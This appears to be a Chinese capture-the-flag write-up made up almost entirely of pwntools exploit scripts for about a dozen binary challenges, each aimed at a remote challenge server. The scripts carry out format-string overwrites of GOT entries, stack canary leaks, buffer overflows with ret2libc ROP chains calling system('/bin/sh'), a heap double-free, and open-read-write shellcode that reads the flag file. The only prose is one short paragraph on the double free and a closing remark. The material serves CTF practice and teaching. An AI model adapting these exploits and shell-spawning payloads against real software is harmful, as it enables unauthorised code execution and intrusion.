one_hundred

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='i386', os='linux', log_level='debug')#, terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file='./one_hundred'
#libc_file=''
elf=ELF(pwn_file)
#libc=ELF(libc_file)
#rop=ROP(libc)

flag=0
if flag:
    io=process(pwn_file)
else:
    ip='1.95.36.136'
    port=2149
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s 		= 	lambda data 				: io.send(data)
sa 		= 	lambda delim,data 			: io.sendafter(str(delim), data)
sl 		= 	lambda data 				: io.sendline(data)
sla 	= 	lambda delim,data 			: io.sendlineafter(str(delim), data)
r 		= 	lambda num 					: io.recv(num)
rl		=	lambda 						: io.recvline()
ru 		= 	lambda delims, drop = True 	: io.recvuntil(delims, drop)
leak 	= 	lambda name,addr 			: log.success('{} = {:#x}'.format(name, addr))
ur32 	= 	lambda data					: u32(io.recv(data).rjust(4,b'\x00'))
ur64 	= 	lambda data 				: u64(io.recv(data).rjust(8,b'\x00'))
uul32 	= 	lambda 						: u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 	= 	lambda 						: u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
i32		=	lambda data					: int(io.recv(data), 16)
i64		=	lambda data					: int(io.recv(data), 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))

n_addr = 0x0804A06C
printf_got = elf.got["printf"]
system_plt = elf.plt["system"]


#gdb.attach(io,"b *0x08048642\nc")
p0 = p32(n_addr) + b"%96c%4$hn"
sl(p0)

p1 = fmtstr_payload(4,{printf_got:system_plt})
sl(p1)

#连接
#--------------------------------------------------------------------------------
ioi()

where_sh

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='i386', os='linux', log_level='debug')#, terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file='./where_sh'
#libc_file=''
elf=ELF(pwn_file)
#libc=ELF(libc_file)
#rop=ROP(libc)

flag=0
if flag:
    io=process(pwn_file)
else:
    ip='1.95.36.136'
    port=2086
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s 		= 	lambda data 				: io.send(data)
sa 		= 	lambda delim,data 			: io.sendafter(str(delim), data)
sl 		= 	lambda data 				: io.sendline(data)
sla 	= 	lambda delim,data 			: io.sendlineafter(str(delim), data)
r 		= 	lambda num 					: io.recv(num)
rl		=	lambda 						: io.recvline()
ru 		= 	lambda delims, drop = True 	: io.recvuntil(delims, drop)
leak 	= 	lambda name,addr 			: log.success('{} = {:#x}'.format(name, addr))
ur32 	= 	lambda data					: u32(io.recv(data).rjust(4,b'\x00'))
ur64 	= 	lambda data 				: u64(io.recv(data).rjust(8,b'\x00'))
uul32 	= 	lambda 						: u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 	= 	lambda 						: u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
i32		=	lambda data					: int(io.recv(data), 16)
i64		=	lambda data					: int(io.recv(data), 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))

bss_addr = 0x0804A06C
gets_plt = elf.plt["gets"]
system_plt = elf.plt["system"]

p0 = b"%27$p"
sl(p0)
io.recvuntil(b"0x")
canary = i32(8)
leak("canary",canary)

p0 = cyclic(0x5c - 0xc) + p32(canary) + cyclic(0xc) + p32(gets_plt) + p32(system_plt) + p32(bss_addr) + p32(bss_addr)
sl(p0)
sl(b"/bin/sh\x00")
#连接
#--------------------------------------------------------------------------------
ioi()

z99

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='amd64', os='linux', log_level='debug')#, terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file='./z99'
#libc_file=''
elf=ELF(pwn_file)
#ibc=ELF(libc_file)
#rop=ROP(libc)

flag=1
if flag:
    io=process(pwn_file)
else:
    ip='1.95.36.136'
    port=2147
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s 		= 	lambda data 				: io.send(data)
sa 		= 	lambda delim,data 			: io.sendafter(str(delim), data)
sl 		= 	lambda data 				: io.sendline(data)
sla 	= 	lambda delim,data 			: io.sendlineafter(str(delim), data)
r 		= 	lambda num 					: io.recv(num)
rl		=	lambda 						: io.recvline()
ru 		= 	lambda delims, drop = True 	: io.recvuntil(delims, drop)
leak 	= 	lambda name,addr 			: log.success('{} = {:#x}'.format(name, addr))
ur32 	= 	lambda data					: u32(io.recv(data).rjust(4,b'\x00'))
ur64 	= 	lambda data 				: u64(io.recv(data).rjust(8,b'\x00'))
uul32 	= 	lambda 						: u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 	= 	lambda 						: u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
i32		=	lambda data					: int(io.recv(data), 16)
i64		=	lambda data					: int(io.recv(data), 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))


z99_addr =0x000000000060108C

gdb.attach(io)
p0 = p64(0) * 3 + p64(0x21) + p64(0) + p64(z99_addr)
sl(p0)
sl(p64(0x11))
#连接
#--------------------------------------------------------------------------------
ioi()

2free

64位题目，开启了NX与canary保护，是一道堆题目。

发现delete函数中进行free后并没有将指针为空，那么这里就存在double free漏洞，且存在shell函数。那么大致的想法就是利用double free将printf的got表修改为shell函数的地址，执行show函数中printf的时候就相当于执行shell函数，从而获取shell了。

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='amd64', os='linux', log_level='debug')#, terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file='./2free'
#libc_file=''
elf=ELF(pwn_file)
#libc=ELF(libc_file)
#rop=ROP(libc)

flag=0
if flag:
    io=process(pwn_file)
else:
    ip='1.95.36.136'
    port=2106
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s 		= 	lambda data 				: io.send(data)
sa 		= 	lambda delim,data 			: io.sendafter(str(delim), data)
sl 		= 	lambda data 				: io.sendline(data)
sla 	= 	lambda delim,data 			: io.sendlineafter(str(delim), data)
r 		= 	lambda num 					: io.recv(num)
rl		=	lambda 						: io.recvline()
ru 		= 	lambda delims, drop = True 	: io.recvuntil(delims, drop)
leak 	= 	lambda name,addr 			: log.success('{} = {:#x}'.format(name, addr))
ur32 	= 	lambda data					: u32(io.recv(data).rjust(4,b'\x00'))
ur64 	= 	lambda data 				: u64(io.recv(data).rjust(8,b'\x00'))
uul32 	= 	lambda 						: u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 	= 	lambda 						: u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
i32		=	lambda data					: int(io.recv(data), 16)
i64		=	lambda data					: int(io.recv(data), 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))

def create(size):
    sla("4.show\n",b"1")
    sla("Size: \n",str(size))

def edit(index,content):
    sla("4.show\n",b"2")
    sla("Index: \n",str(index))
    sla("Contents: \n",content)

def delete(index):
    sla("4.show\n",b"3")
    sla("Index: \n",str(index))

def show(index):
    sl(b"4")
    sl(str(index))

shell_addr = 0x400C26
printf_got_addr = elf.got['printf']
back =printf_got_addr - 22

create(0x30)
create(0x30)

delete(0)
delete(1)
delete(0)
#gdb.attach(io)

create(0x30)
edit(0,p64(back))
create(0x30)
create(0x30)
create(0x30)
content = b'\x40\x00\x00\x00\x00\x00' + p64(shell_addr) + b"\x56\x07\x40\x00\x00\x00\x00\x00"
edit(5,content)
show(5)

#连接
#--------------------------------------------------------------------------------
ioi()

bank

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='i386', os='linux', log_level='debug', terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file='./bank'
#libc_file=''
elf=ELF(pwn_file)
#libc=ELF(libc_file)
#rop=ROP(libc)

flag=0
if flag:
    io=process(pwn_file)
else:
    ip='1.95.36.136'
    port=2069
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s 		= 	lambda data 				: io.send(data)
sa 		= 	lambda delim,data 			: io.sendafter(str(delim), data)
sl 		= 	lambda data 				: io.sendline(data)
sla 	= 	lambda delim,data 			: io.sendlineafter(str(delim), data)
r 		= 	lambda num 					: io.recv(num)
rl		=	lambda 						: io.recvline()
ru 		= 	lambda delims, drop = True 	: io.recvuntil(delims, drop)
leak 	= 	lambda name,addr 			: log.success('{} = {:#x}'.format(name, addr))
ur32 	= 	lambda data					: u32(io.recv(data).rjust(4,b'\x00'))
ur64 	= 	lambda data 				: u64(io.recv(data).rjust(8,b'\x00'))
uul32 	= 	lambda 						: u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 	= 	lambda 						: u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
i32		=	lambda data					: int(io.recv(data), 16)
i64		=	lambda data					: int(io.recv(data), 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))

money_addr = 0x0804A06C

p0 = p32(money_addr) + b"%9995c%6$hn"
sl(p0)

#连接
#--------------------------------------------------------------------------------
ioi()

littlecan

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='i386', os='linux', log_level='debug')#, terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file='./littlecan'
#libc_file=''
elf=ELF(pwn_file)
#libc=ELF(libc_file)
#rop=ROP(libc)

flag=0
if flag:
    io=process(pwn_file)
else:
    ip='1.95.36.136'
    port=2109
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s 		= 	lambda data 				: io.send(data)
sa 		= 	lambda delim,data 			: io.sendafter(str(delim), data)
sl 		= 	lambda data 				: io.sendline(data)
sla 	= 	lambda delim,data 			: io.sendlineafter(str(delim), data)
r 		= 	lambda num 					: io.recv(num)
rl		=	lambda 						: io.recvline()
ru 		= 	lambda delims, drop = True 	: io.recvuntil(delims, drop)
leak 	= 	lambda name,addr 			: log.success('{} = {:#x}'.format(name, addr))
ur32 	= 	lambda data					: u32(io.recv(data).rjust(4,b'\x00'))
ur64 	= 	lambda data 				: u64(io.recv(data).rjust(8,b'\x00'))
uul32 	= 	lambda 						: u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 	= 	lambda 						: u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
i32		=	lambda data					: int(io.recv(data), 16)
i64		=	lambda data					: int(io.recv(data), 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))

#gdb.attach(io)
sl(b"\x00\x67")
sl(b"%31$p")

io.recvuntil("0x")
canary = int(io.recv(8), 16)
leak("canary", canary)

p0 = cyclic(0x70 - 0xc) + p32(canary) + cyclic(0xc) +p32(0x8048621)
sl(p0)
#连接
#--------------------------------------------------------------------------------
ioi()

sandbox1

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='i386', os='linux', log_level='debug', terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file='./sandbox1'
#libc_file=''
elf=ELF(pwn_file)
#libc=ELF(libc_file)
#rop=ROP(libc)

flag=0
if flag:
    io=process(pwn_file)
else:
    ip='1.95.36.136'
    port=2098
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s 		= 	lambda data 				: io.send(data)
sa 		= 	lambda delim,data 			: io.sendafter(str(delim), data)
sl 		= 	lambda data 				: io.sendline(data)
sla 	= 	lambda delim,data 			: io.sendlineafter(str(delim), data)
r 		= 	lambda num 					: io.recv(num)
rl		=	lambda 						: io.recvline()
ru 		= 	lambda delims, drop = True 	: io.recvuntil(delims, drop)
leak 	= 	lambda name,addr 			: log.success('{} = {:#x}'.format(name, addr))
ur32 	= 	lambda data					: u32(io.recv(data).rjust(4,b'\x00'))
ur64 	= 	lambda data 				: u64(io.recv(data).rjust(8,b'\x00'))
uul32 	= 	lambda 						: u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 	= 	lambda 						: u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
i32		=	lambda data					: int(io.recv(data), 16)
i64		=	lambda data					: int(io.recv(data), 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))

bss_addr = elf.bss()+0x100
addr = 0x8108000

shellcode = orw('./flag',bss_addr,0x100)
sl(shellcode)
#连接
#--------------------------------------------------------------------------------
ioi()

zero

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='i386', os='linux', log_level='debug', terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file='./zero'
#libc_file=''
elf=ELF(pwn_file)
#libc=ELF(libc_file)
#rop=ROP(libc)

flag=0
if flag:
    io=process(pwn_file)
else:
    ip='1.95.36.136'
    port=2139
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s 		= 	lambda data 				: io.send(data)
sa 		= 	lambda delim,data 			: io.sendafter(str(delim), data)
sl 		= 	lambda data 				: io.sendline(data)
sla 	= 	lambda delim,data 			: io.sendlineafter(str(delim), data)
r 		= 	lambda num 					: io.recv(num)
rl		=	lambda 						: io.recvline()
ru 		= 	lambda delims, drop = True 	: io.recvuntil(delims, drop)
leak 	= 	lambda name,addr 			: log.success('{} = {:#x}'.format(name, addr))
ur32 	= 	lambda data					: u32(io.recv(data).rjust(4,b'\x00'))
ur64 	= 	lambda data 				: u64(io.recv(data).rjust(8,b'\x00'))
uul32 	= 	lambda 						: u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 	= 	lambda 						: u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
i32		=	lambda data					: int(io.recv(data), 16)
i64		=	lambda data					: int(io.recv(data), 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))

polar_addr = 0x00002080 
io.recvuntil("0x")
base_addr=int(io.recv(8),16) - polar_addr
leak('base_addr',base_addr)
xin_addr = base_addr + 0x000008C0
p0 = cyclic(0x6c + 4) + p32(xin_addr)
sl(p0)
sl(b"$0")
#连接
#--------------------------------------------------------------------------------
ioi()

bllhl_canary

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='amd64', os='linux', log_level='debug')#, terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file='./bllhl_canary'
libc_file='./bllhl_canary.so.6'
elf=ELF(pwn_file)
libc=ELF(libc_file)
rop=ROP(libc)

flag=0
if flag:
    io=process(pwn_file)
else:
    ip='1.95.36.136'
    port=2092
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s 		= 	lambda data 				: io.send(data)
sa 		= 	lambda delim,data 			: io.sendafter(str(delim), data)
sl 		= 	lambda data 				: io.sendline(data)
sla 	= 	lambda delim,data 			: io.sendlineafter(str(delim), data)
r 		= 	lambda num 					: io.recv(num)
rl		=	lambda 						: io.recvline()
ru 		= 	lambda delims, drop = True 	: io.recvuntil(delims, drop)
leak 	= 	lambda name,addr 			: log.success('{} = {:#x}'.format(name, addr))
ur32 	= 	lambda data					: u32(io.recv(data).rjust(4,b'\x00'))
ur64 	= 	lambda data 				: u64(io.recv(data).rjust(8,b'\x00'))
uul32 	= 	lambda 						: u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 	= 	lambda 						: u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
i32		=	lambda data					: int(io.recv(data), 16)
i64		=	lambda data					: int(io.recv(data), 16)
i6      =	lambda data					: int(data, 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))


p0=b'%38$p.%39$p.%41$p.%49$p.kkkk'
s(p0)
ru("[echo] ")
a,b,c,libcbase,d=ru(b'k'*4).decode().split('.')
a=i6(a)
b=i6(b)
c=i6(c)
libcbase=i6(libcbase)-0x29d90

leak('a',a)
leak('b',b)
leak('c',c)
leak('libcbase',libcbase)

system = libcbase+libc.sym['system']
binsh = libcbase+next(libc.search(b'/bin/sh'))
rdi = libcbase+rop.find_gadget(['pop rdi', 'ret'])[0]
ret = libcbase+rop.find_gadget(['ret'])[0]

p1 = b'b'*0x60+flat(a,b,0,c)+0x18*b'b'+flat(ret,rdi,binsh,system)
sl(p1)
#连接
#--------------------------------------------------------------------------------
ioi()

bllhl_fmt

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='amd64', os='linux', log_level='debug', terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file='./bllhl_fmt'
libc_file='./bllhl_fmt.so.6'
elf=ELF(pwn_file)
libc=ELF(libc_file)
rop=ROP(libc)

flag=0
if flag:
    io=process(pwn_file)
else:
    ip='1.95.36.136'
    port=2143
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s 		= 	lambda data 				: io.send(data)
sa 		= 	lambda delim,data 			: io.sendafter(str(delim), data)
sl 		= 	lambda data 				: io.sendline(data)
sla 	= 	lambda delim,data 			: io.sendlineafter(str(delim), data)
r 		= 	lambda num 					: io.recv(num)
rl		=	lambda 						: io.recvline()
ru 		= 	lambda delims, drop = True 	: io.recvuntil(delims, drop)
leak 	= 	lambda name,addr 			: log.success('{} = {:#x}'.format(name, addr))
ur32 	= 	lambda data					: u32(io.recv(data).rjust(4,b'\x00'))
ur64 	= 	lambda data 				: u64(io.recv(data).rjust(8,b'\x00'))
uul32 	= 	lambda 						: u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 	= 	lambda 						: u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
i32		=	lambda data					: int(io.recv(data), 16)
i64		=	lambda data					: int(io.recv(data), 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))

p0 = b"%45$p+%43$p"
sl(p0)
io.recvuntil('0x')
addr_base = int(io.recv(12),16) - 0x0120E
io.recvuntil('+0x')
libc_base = int(io.recv(12),16) - 0x29d90
leak('addr_base',addr_base)
leak('libc_base',libc_base)

system = libc_base+libc.sym['system']
binsh = libc_base+next(libc.search(b'/bin/sh'))
rdi = libc_base+rop.find_gadget(['pop rdi', 'ret'])[0]
ret = libc_base+rop.find_gadget(['ret'])[0]

st = libc_base + libc.sym['environ']
p1 = b"kkkk%8$s" + p64(st)
sl(p1)
io.recvuntil('kkkk')
stack_addr = u64(io.recv(6).ljust(8,b'\x00')) - 0x120 - 0x130
leak('stack_addr',stack_addr)

add58 = libc_base+0x00000000000a0265
pay=fmtstr_payload(7,{stack_addr:add58},numbwritten=8,write_size='short')
pay=pay.ljust(0x50,b'b')+flat(rdi,binsh,ret,system)
sl(pay)
#连接
#--------------------------------------------------------------------------------
ioi()

bllhl_book

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='amd64', os='linux', log_level='debug', terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file='./bllhl_book'
libc_file='./bllhl_fmt.so.6'
elf=ELF(pwn_file)
libc=ELF(libc_file)
rop=ROP(libc)

flag=0
if flag:
    io=process(pwn_file)
else:
    ip='1.95.36.136'
    port=2061
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s 		= 	lambda data 				: io.send(data)
sa 		= 	lambda delim,data 			: io.sendafter(str(delim), data)
sl 		= 	lambda data 				: io.sendline(data)
sla 	= 	lambda delim,data 			: io.sendlineafter(str(delim), data)
r 		= 	lambda num 					: io.recv(num)
rl		=	lambda 						: io.recvline()
ru 		= 	lambda delims, drop = True 	: io.recvuntil(delims, drop)
leak 	= 	lambda name,addr 			: log.success('{} = {:#x}'.format(name, addr))
ur32 	= 	lambda data					: u32(io.recv(data).rjust(4,b'\x00'))
ur64 	= 	lambda data 				: u64(io.recv(data).rjust(8,b'\x00'))
uul32 	= 	lambda 						: u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 	= 	lambda 						: u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
i32		=	lambda data					: int(io.recv(data), 16)
i64		=	lambda data					: int(io.recv(data), 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))

def create(s,a,d,f):
    sl(b"1")
    sl(str(s))
    sl(a)
    sl(str(d))
    sl(f)

def rename(a):
    sl(b"5")
    sl(a)

def back():
    sl(b"6")

def print_book():
    sl(b"4")

def edit(s,a):
    sl(b"3")
    sl(str(s))
    sl(a)
addr = 0x00404018
puts_got = elf.got['puts']
sl(b"haoo")
p0 = b'b'
p0 = flat(1,puts_got,addr,0x80)
create(0x20,b'b',0x60,p0)
rename(b'a'*0x20)
print_book()
io.recvuntil("Name: ")
libc_base = u64(io.recv(6).ljust(8,b'\x00')) - libc.sym['puts']
leak('libc_base',libc_base)

system = libc_base+libc.sym['system']
binsh = libc_base+next(libc.search(b'/bin/sh\x00'))
stdout = libc_base+libc.sym['_IO_2_1_stdout_']
edit(1,p64(system)+p64(stdout))
rename(b"/bin/sh\x00")
back()
#连接
#--------------------------------------------------------------------------------
ioi()

后面两道题借鉴了其他师傅的wp，主要我还是太菜了，有些手法还不怎么知道，得继续加强练习了。